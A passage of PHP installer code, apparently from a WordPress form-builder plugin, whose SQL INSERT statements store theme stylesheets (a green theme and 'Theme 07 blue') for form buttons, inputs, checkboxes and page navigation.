18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	border: 1px solid #959595;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/06/previous.png) no-repeat left #E8E8E8;\r\n}\r\n.previous-page div.wdform-page-button:before {\r\n	content: " ";\r\n	background: url([SITE_ROOT]/images/06/previous.png) no-repeat left;\r\n	height: 19px;\r\n	width: 20px;\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	top: -2px;\r\n	position: relative;\r\n}\r\n.button-submit {\r\ncolor: #473C34;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 35px;\r\nline-height: 35px;\r\nbackground: #6BD86B;\r\npadding: 0px 20px;\r\nvertical-align: middle;\r\nfont-size: 18px;\r\nborder: 1px solid #459B45;\r\n}\r\n.button-submit:hover {\r\n	background: #90EE90;\r\n}\r\n.button-reset {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #959595;\r\n	margin-left: 5px;\r\n}\r\n.button-reset:hover {\r\n	background: #E8E8E8;\r\n}\r\n.wdform_page {\r\n	background: transparent;\r\n	padding: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_section_break2{\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: #6BD86B ;\r\n	color: #030303;\r\n	font-size: 16px;\r\n	text-align: left;\r\npadding: 7px 30px 10px;\r\n}\r\n\r\n.wdform_section_break2:after {\r\n	content: " " ;\r\n	position: relative;\r\n	width: 16px;\r\n	height: 13px;\r\n	top: -3px;\r\n	left: 1px;\r\n	box-shadow: 0px 7px 2px #c9c9c9;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\n	margin: 16px 10px 16px 0px;\r\ncolor:#4C4C4C;\r\n	font-size: 16px;\r\n}\r\n.wdform_section {\r\n	display: table-row;\r\n}\r\nselect {\r\n	border-radius: 5px;\r\n	height: 27px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nborder: 1px solid #ABAAAA;\r\nbackground: transparent;\r\ncolor: #5C5C5C;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ninput[type="password"]{\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ntextarea {\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ninput[type="text"]:focus{\r\n	border: 1px solid #6BD86B ;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	border: 1px solid #6BD86B  ;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border: 1px solid #6BD86B ;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #6BD86B ;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/06/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 20px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 14px;\r\n	height: 13px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\nbox-shadow: 0px 3px 9px 1px rgb(218, 218, 218) inset;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #4C4C4C;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #4C4C4C;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #342114;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding: 5px 25px 0px 25px;\r\n	font-weight: bold;\r\n	background-color: #90EE90;\r\n	margin-right: 1px;\r\n}\r\n.page_active {\r\n	color: #342114;\r\n	cursor: pointer;\r\n	background-color: #6BD86B;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 20px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 25px 0px 25px;\r\n	margin-right: 1px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	vertical-align: middle;\r\n	background: #72DB72 ;\r\n	background: -moz-linear-gradient(left, #8FEB8F 0%, #5CF35C 39%, #72DB72 100%);\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #8FEB8F ), color-stop(39%, #5CF35C ), color-stop(100%, #72DB72 ));\r\n	background: -o-linear-gradient(left, #8FEB8F 0%, #5CF35C 39%, #72DB72 100%);\r\nbackground: -ms-linear-gradient(left, #8FEB8F 0%, #5CF35C 39%, #72DB72 100%);\r\nbackground: -webkit-linear-gradient(left, #8FEB8F 0%, #5CF35C 39%, #72DB72 100%);\r\n\r\n}\r\n.page_percentage_deactive {\r\n	height: 23px;\r\n	line-height: 23px;\r\nbackground-color: #E0E0E0;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: left !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #473C34;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #ffffff;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 23px;\r\n	height: 23px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}\r\n\r\n.wdform-section-break-div\r\n{\r\nborder-top:1px solid #ABAAAA !important;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`id`, `title`, `css`, `default`) VALUES(24, \'Theme 07 blue\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #0072A2;\r\nmargin-bottom: 10px;\r\ncolor: #0072A2;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 16px;\r\n	height: 16px;\r\n	top: -6px;\r\n	border: 0px;\r\n	border-radius: 13px;\r\n	background: #A4A4A4;\r\n	border: 1px solid #fff;\r\n	outline: none;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F1F1F1 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #696969;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #0072A2 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #0072A2 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #0072A2 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #0072A2 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #0072A2 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #0072A2 !important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #0072A2 !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F1F1F1;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/07/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 71px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/07/upload.png);\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background:url([SITE_ROOT]/images/07/next.png) no-repeat right #0072A2;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background:url([SITE_ROOT]/images/07/previous.png) no-repeat left #F0EFEF;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border-right: 1px solid #CECECE;\r\n} \r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #0072A2;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: #FFFFFF;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #267EA9;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 20px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #267EA9;\r\n	font-size: 20px;\r\nmargin: 16px 0px;\r\n\r\n}\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nbackground: #F1F1F1;\r\nborder: 1px solid transparent;\r\ncolor: #696969;\r\n	outline: none;\r\n}\r\ninput[type="text"] {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ninput[type="password"] {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ninput[type="text"]:focus{\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #A8A8A8;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	color: #0072A2;\r\n	background-color: #ECEBEB;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 25px 0px 25px;\r\n	font-size: 12px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #0072A2;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 18px;\r\n	line-height: 18px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #006C9A; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #0072A2 0%, 